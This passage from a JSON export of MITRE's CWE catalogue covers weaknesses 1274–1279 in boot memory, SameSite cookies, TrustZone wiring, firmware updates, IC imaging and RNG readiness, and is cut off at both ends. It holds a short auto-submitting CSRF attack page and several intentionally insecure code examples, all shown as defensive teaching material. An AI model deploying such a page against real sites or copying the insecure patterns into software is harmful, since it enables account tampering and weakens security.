compromised."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Integration"},{"Phase":"Manufacturing"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Modify Memory","Read Memory","Modify Files or Directories","Read Files or Directories","Modify Application Data","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"Once unlock credentials are compromised, an attacker can use the credentials to unlock the device and gain unauthorized access to the hidden functionalities protected by those credentials."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Integration","Description":"Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific."},{"Phase":"Manufacturing","Description":"Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows how an attacker can take advantage of compromised credentials.","Example_Code":[{"#text":"Suppose a semiconductor chipmaker, \u201cC\u201d, uses the foundry \u201cF\u201d for fabricating its chips. Now, F has many other customers in addition to C, and some of the other customers are much smaller companies. F has dedicated teams for each of its customers, but somehow it mixes up the unlock credentials and sends the unlock credentials of C to the wrong team. This other team does not take adequate precautions to protect the credentials that have nothing to do with them, and eventually the unlock credentials of C get leaked.","attr":{"@_Nature":"bad"}},{"#text":"Vertical integration of a production company is one effective method of protecting sensitive credentials. Where vertical integration is not possible, strict access control and need-to-know are methods which can be implemented to reduce these risks.","attr":{"@_Nature":"good"}}],"Body_Text":"When the credentials of multiple organizations are stored together, exposure to third parties occurs frequently."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"560"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"}}},"1274":{"attr":{"@_ID":"1274","@_Name":"Improper Access Control for Volatile Memory Containing Boot Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory.","Extended_Description":{"xhtml:p":["Adversaries could bypass the secure-boot process and execute their own untrusted, malicious boot code.","As a part of a secure-boot process, the read-only-memory (ROM) code for a System-on-Chip (SoC) or other system fetches bootloader code from Non-Volatile Memory (NVM) and stores the code in Volatile Memory (VM), such as dynamic, random-access memory (DRAM) or static, random-access memory (SRAM). The NVM is usually external to the SoC, while the VM is internal to the SoC. As the code is transferred from NVM to VM, it is authenticated by the SoC\'s ROM code.","If the volatile-memory-region protections or access controls are insufficient to prevent modifications from an adversary or untrusted agent, the secure boot may be bypassed or replaced with the execution of an adversary\'s code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This weakness can be introduced during hardware architecture or design but can be identified later during testing."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Ensure the volatile memory is lockable or has locks. Ensure the volatile memory is locked for writes from untrusted agents or adversaries. Try modifying the volatile memory from an untrusted agent, and ensure these writes are dropped.","Effectiveness":"High"},{"Method":"Manual Analysis","Description":{"xhtml:p":["Analyze the device using the following steps:","Only trusted masters should be allowed to write to the memory regions. For example, pluggable device peripherals should not have write access to program load memory regions."],"xhtml:ul":{"xhtml:li":["1) Identify all fabric master agents that are active during system Boot Flow when initial code is loaded from Non-volatile storage to volatile memory.","2) Identify the volatile memory regions that are used for storing loaded system executable program.","3) During system boot, test programming the identified memory regions in step 2 from all the masters identified in step 1."]}},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that the design of volatile-memory protections is enough to prevent modification from an adversary or untrusted code."},{"Phase":"Testing","Description":"Test the volatile-memory protections to ensure they are safe from modification or untrusted code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A typical SoC secure boot\'s flow includes fetching the next piece of code (i.e., the boot loader) from NVM (e.g., serial, peripheral interface (SPI) flash), and transferring it to DRAM/SRAM volatile, internal memory, which is more efficient.","Example_Code":[{"#text":"The volatile-memory protections or access controls are insufficient.","attr":{"@_Nature":"bad"}},{"#text":"A good architecture should define appropriate protections or access controls to prevent modification by an adversary or untrusted agent, once the bootloader is authenticated.","attr":{"@_Nature":"good"}}],"Body_Text":"The memory from where the boot loader executes can be modified by an adversary."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-2267","Description":"Locked memory regions may be modified through other interfaces in a secure-boot-loader image due to improper access control.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2267"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"},"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"suggested content improvements"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided detection method"}]}},"1275":{"attr":{"@_ID":"1275","@_Name":"Sensitive Cookie with Improper SameSite Attribute","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The SameSite attribute for sensitive cookies is not set, or an insecure value is used.","Extended_Description":"The SameSite attribute controls how cookies are sent for cross-domain requests. This attribute may have three values: \'Lax\', \'Strict\', or \'None\'. If the \'None\' value is used, a website may create a cross-domain POST HTTP request to another website, and the browser automatically adds cookies to this request. This may lead to Cross-Site-Request-Forgery (CSRF) attacks if there are no additional protections in place (such as Anti-CSRF tokens).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"352","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness occurs during implementation when the coder does not properly set the SameSite attribute."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Non-Repudiation","Access Control"],"Impact":"Modify Application Data","Likelihood":"Low","Note":"If the website does not impose additional defense against CSRF attacks, failing to use the \'Lax\' or \'Strict\' values could increase the risk of exposure to CSRF attacks. The likelihood of the integrity breach is Low because a successful attack does not only depend on an insecure SameSite attribute. In order to perform a CSRF attack there are many conditions that must be met, such as the lack of CSRF tokens, no confirmations for sensitive actions on the website, a \\"simple\\" \\"Content-Type\\" header in the HTTP request and many more."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Set the SameSite attribute of a sensitive cookie to \'Lax\' or \'Strict\'. This instructs the browser to apply this cookie only to same-domain requests, which provides a good Defense in Depth against CSRF attacks. When the \'Lax\' value is in use, cookies are also sent for top-level cross-domain navigation via HTTP GET, HEAD, OPTIONS, and TRACE methods, but not for other HTTP methods that are more like to cause side-effects of state mutation.","Effectiveness":"High","Effectiveness_Notes":"While this mitigation is effective for protecting cookies from a browser\'s own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a cookie is used to store a session ID for a client\'s interaction with a website. The snippet of code below establishes a new cookie to hold the sessionID.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"let sessionId = generateSessionId()let cookieOptions = { domain: \'example.com\' }response.cookie(\'sessionid\', sessionId, cookieOptions)","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":{"#text":"<html>","xhtml:div":{"#text":"<form id=evil action=\\"http://local:3002/setEmail\\" method=\\"POST\\"><input type=\\"hidden\\" name=\\"newEmail\\" value=\\"abc@example.com\\" /></form><script>evil.submit()</script></html>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"let sessionId = generateSessionId()let cookieOptions = { domain: \'example.com\', sameSite: \'Strict\' }response.cookie(\'sessionid\', sessionId, cookieOptions","xhtml:br":["",""]}}],"Body_Text":["Since the sameSite attribute is not specified, the cookie will be sent to the website with each request made by the client. An attacker who can potentially perform CSRF attack by using the following malicious page:","When the client visits this malicious web page, it submits a \'/setEmail\' POST HTTP request to the vulnerable website. Since the browser automatically appends the \'sessionid\' cookie to the request, the website automatically performs a \'setEmail\' action on behalf of the client.","To mitigate the risk, use the sameSite attribute of the \'sessionid\' cookie set to \'Strict\'."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"62"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1104"}},{"attr":{"@_External_Reference_ID":"REF-1105"}},{"attr":{"@_External_Reference_ID":"REF-1106"}}]},"Content_History":{"Submission":{"Submission_Name":"Michael Stepankin","Submission_Organization":"Veracode","Submission_Date":"2020-06-19"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"}}},"1276":{"attr":{"@_ID":"1276","@_Name":"Hardware Child Block Incorrectly Connected to Parent System","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Signals between a hardware IP and the parent system design are incorrectly connected causing security risks.","Extended_Description":{"xhtml:p":"Individual hardware IP must communicate with the parent system in order for the product to function correctly and as intended. If implemented incorrectly, while not causing any apparent functional issues, may cause security issues. For example, if the IP should only be reset by a system-wide hard reset, but instead the reset input is connected to a software-triggered debug mode reset (which is also asserted during a hard reset), integrity of data inside the IP can be violated."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness is introduced when integrating IP into a parent design."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"System-level verification may be used to ensure that components are correctly connected and that design security requirements are not violated due to interactions between various IP blocks."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Many SoCs use hardware to partition system resources between trusted and un-trusted entities. One example of this concept is the Arm TrustZone, in which the processor and all security-aware IP attempt to isolate resources based on the status of a privilege bit. This privilege bit is part of the input interface in all TrustZone-aware IP. If this privilege bit is accidentally grounded or left unconnected when the IP is instantiated, privilege escalation of all input data may occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:p":["// IP definition","module tz_peripheral(clk, reset, data_in, data_in_security_level, ...);",{"#text":"input clk, reset;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input [31:0] data_in;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input data_in_security_level;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule","// Instantiation of IP in a parent system","module soc(...)",{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},{"#text":"tz_peripheral u_tz_peripheral(","attr":{"@_style":"text-indent: 15px;"}},{"#text":".clk(clk),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".rst(rst),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in(rdata),","attr":{"@_style":"text-indent: 30px;"}},{"#text":"//Copy-and-paste error or typo grounds data_in_security_level (in this example 0=secure, 1=non-secure) effectively promoting all data to \u201csecure\u201d)","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in_security_level(1\'b0),","attr":{"@_style":"text-indent: 30px;"}},{"#text":");","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule"]},{"attr":{"@_Nature":"good","@_Language":"Verilog"},"xhtml:p":["// Instantiation of IP in a parent system","module soc(...)",{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},{"#text":"tz_peripheral u_tz_peripheral(","attr":{"@_style":"text-indent: 15px;"}},{"#text":".clk(clk),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".rst(rst),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in(rdata),","attr":{"@_style":"text-indent: 30px;"}},{"#text":"// This port is no longer grounded, but instead drive by the appropriate signal","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in_security_level(rdata_security_level),","attr":{"@_style":"text-indent: 30px;"}},{"#text":");","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule"]}],"Body_Text":"In the Verilog code below, the security level input to the TrustZone aware peripheral is correctly driven by an appropriate signal instead of being grounded."}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-22"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations"},"Previous_Entry_Name":{"#text":"Hardware Block Incorrectly Connected to Larger System","attr":{"@_Date":"2020-08-20"}}}},"1277":{"attr":{"@_ID":"1277","@_Name":"Firmware Not Updateable","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not provide its\\n\\t\\t\\tusers with the ability to update or patch its\\n\\t\\t\\tfirmware to address any vulnerabilities or\\n\\t\\t\\tweaknesses that may be present.","Extended_Description":"Without the ability to\\n\\t\\t\\tpatch or update firmware, consumers will be\\n\\t\\t\\tleft vulnerable to exploitation of any known\\n\\t\\t\\tvulnerabilities, or any vulnerabilities that\\n\\t\\t\\tare discovered in the future. This can expose\\n\\t\\t\\tconsumers to permanent risk throughout the\\n\\t\\t\\tentire lifetime of the device, which could be\\n\\t\\t\\tyears or decades. Some external protective\\n\\t\\t\\tmeasures and mitigations might be employed to\\n\\t\\t\\taid in preventing or reducing the risk of\\n\\t\\t\\tmalicious attack, but the root weakness cannot\\n\\t\\t\\tbe corrected.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1329","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Requirements","Note":"Requirements development might not consider the importance of updates over the lifetime of the product, or might not choose the ability due to concerns such as expense or speed to market."},{"Phase":"Architecture and Design","Note":"Lack of planning during architecture development and design, or external pressures such as speed to market, could ignore the capability to update."},{"Phase":"Implementation","Note":"The weakness can appear through oversight during implementation."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Likelihood":"Medium","Note":"If an attacker can identify an exploitable vulnerability in one device that has no means of patching, the attack may be used against an entire class of devices."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Create a new installable boot image of the current build with a minor version number change. Use the standard installation method to update the boot image. Verify that the minor version number has changed. Create a fake image. Verify that the boot updater will not install the fake image and generates an invalid image error message.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Check the consumer or maintainer documentation, the architecture/design documentation, or the original requirements to ensure that the documentation includes details for how to update the firmware.","Effectiveness":"Moderate"},{"Method":"Manual Dynamic Analysis","Description":"Determine if there is a lack of a capability to update read-only memory structure. This could manifest as a difference between the latest firmware version and current version within the device.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify requirements to provide the ability to update the firmware."},{"Phase":"Architecture and Design","Description":"Design the device to allow for updating the firmware."},{"Phase":"Implementation","Description":"Implement the necessary functionality to allow the firmware to be updated."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-145"},"Intro_Text":"A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes.","Example_Code":[{"#text":"The refrigerator has no means of patching and is hacked becoming a spewer of email spam.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The device automatically patches itself and provides considerable more protection against being hacked.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-9054","Description":"Chain: network-attached storage (NAS) device has a critical OS command injection (CWE-78) vulnerability that is actively exploited to place IoT devices into a botnet, but some products are \\"end-of-support\\" and cannot be patched (CWE-1277). [REF-1097]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9054"},{"Reference":"REF-1095","Description":"hardware \\"smart lock\\" has weak key generation, allowing attackers to steal the key by BLE sniffing, but the device\'s firmware cannot be upgraded [REF-1095].","Link":"https://www.theregister.com/2019/12/11/f_secure_keywe/"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1095"}},{"attr":{"@_External_Reference_ID":"REF-1096"}},{"attr":{"@_External_Reference_ID":"REF-1097"}}]},"Notes":{"Note":{"#text":"The \\"firmware\\" term does not have a single commonly-shared definition, so there may be variations in how this CWE entry is interpreted during mapping.","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Paul A. Wortman","Contribution_Organization":"Wells Fargo","Contribution_Date":"2021-10-12","Contribution_Comment":"provided detection methods and observed examples"}}},"1278":{"attr":{"@_ID":"1278","@_Name":"Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Information stored in hardware may be recovered by an attacker with the capability to capture and analyze images of the integrated circuit using techniques such as scanning electron microscopy.","Extended_Description":{"xhtml:p":["The physical structure of a device, viewed at high enough magnification, can reveal the information stored inside. Typical steps in IC reverse engineering involve removing the chip packaging (decapsulation) then using various imaging techniques ranging from high resolution x-ray microscopy to invasive techniques involving removing IC layers and imaging each layer using a scanning electron microscope.","The goal of such activities is to recover secret keys, unique device identifiers, and proprietary code and circuit designs embedded in hardware that the attacker has been unsuccessful at accessing through other means. These secrets may be stored in non-volatile memory or in the circuit netlist. Memory technologies such as masked ROM allow easier to extraction of secrets than One-time Programmable (OTP) memory."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Varies by Context","Note":"A common goal of malicious actors who reverse engineer ICs is to produce and sell counterfeit versions of the IC."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"The cost of secret extraction via IC reverse engineering should outweigh the potential value of the secrets being extracted. Threat model and value of secrets should be used to choose the technology used to safeguard those secrets. Examples include IC camouflaging and obfuscation, tamper-proof packaging, active shielding, and physical tampering detection information erasure."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider an SoC design that embeds a secret key in read-only memory (ROM). The key is baked into the design logic and may not be modified after fabrication causing the key to be identical for all devices. An attacker in possession of the IC can decapsulate and delayer the device. After imaging the layers, computer vision algorithms or manual inspection of the circuit features locate the ROM and reveal the value of the key bits as encoded in the visible circuit structure of the ROM."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1092"}},{"attr":{"@_External_Reference_ID":"REF-1129"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements. It is more attack-oriented, so it might be more suited for CAPEC.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-20"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"1279":{"attr":{"@_ID":"1279","@_Name":"Cryptographic Operations are run Before Supporting Units are Ready","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Performing cryptographic operations without ensuring that the supporting inputs are ready to supply valid data may compromise the cryptographic result.","Extended_Description":"Many cryptographic hardware units depend upon other hardware units to supply information to them to produce a securely encrypted result. For example, a cryptographic unit that depends on an external random-number-generator (RNG) unit for entropy must wait until the RNG unit is producing random numbers. If a cryptographic unit retrieves a private encryption key from a fuse unit, the fuse unit must be up and running before a key may be supplied.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"The decision to continue using a cryptographic unit even though the input units to it are not producing valid data will compromise the encrypted result."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Integrity","Availability","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Best practices should be used to design cryptographic systems."},{"Phase":"Implementation","Description":"Continuously ensuring that cryptographic inputs are supplying valid information is necessary to ensure that the encrypted output is secure."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following pseudocode illustrates the weak encryption resulting from the use of a pseudo-random-number generator output.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["If random_number_generator_self_test_passed() == TRUE","then Seed = get_random_number_from_RNG()","else Seed = hardcoded_number"]},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["If random_number_generator_self_test_passed() == TRUE","then Seed = get_random_number_from_RNG()","else enter_error_state()"]}],"Body_Text":"In the example above, first a check of RNG ready is performed. If the check fails, the RNG is ignored and a hard coded value is used instead. The hard coded value severely weakens the encrypted output."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Cryptographic Primitives used without Successful Self-Test","attr":{"@_Date":"2020-08-20"}}}},"1280":{"attr":{"@_ID":"1280","@_Name":"Access Control Check Implemented After Asset is Accessed","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product\'s hardware-based access control check occurs after the asset has been accessed.","Extended_Description":{"xhtml:p":"The product implements a hardware-based access control check. The asset should be accessible only after the check is successful. If, however, this operation is not atomic and the asset is accessed before the check is complete, the security of the system may be 